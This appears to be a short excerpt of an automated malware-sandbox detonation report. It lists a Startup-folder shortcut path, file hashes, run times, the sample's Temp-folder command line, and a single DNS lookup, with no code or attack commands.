C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\94d0f9.lnk

MD5 8161c39ba953516c0e1008122e640aed
SHA1 80b14501ee4741738d9d92791c32551ce3e83081
SHA256 3cec5b4cece43ef5d00d06f572d9d64c98efcc86c78965d5a2b48daefae5daa5
SHA512 1863100267a4a3148a4540a166309d8accd17eeb22743bd5b0af4f092d86a89e43336e3c908058dab3d9dcfdc5f25433225f65979215867d0dc952ca5300ca16

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 13:38

Reported

2024-06-18 13:40

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\bc383c949e2fa230cb2cc945b1c6535f_JaffaCakes118.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A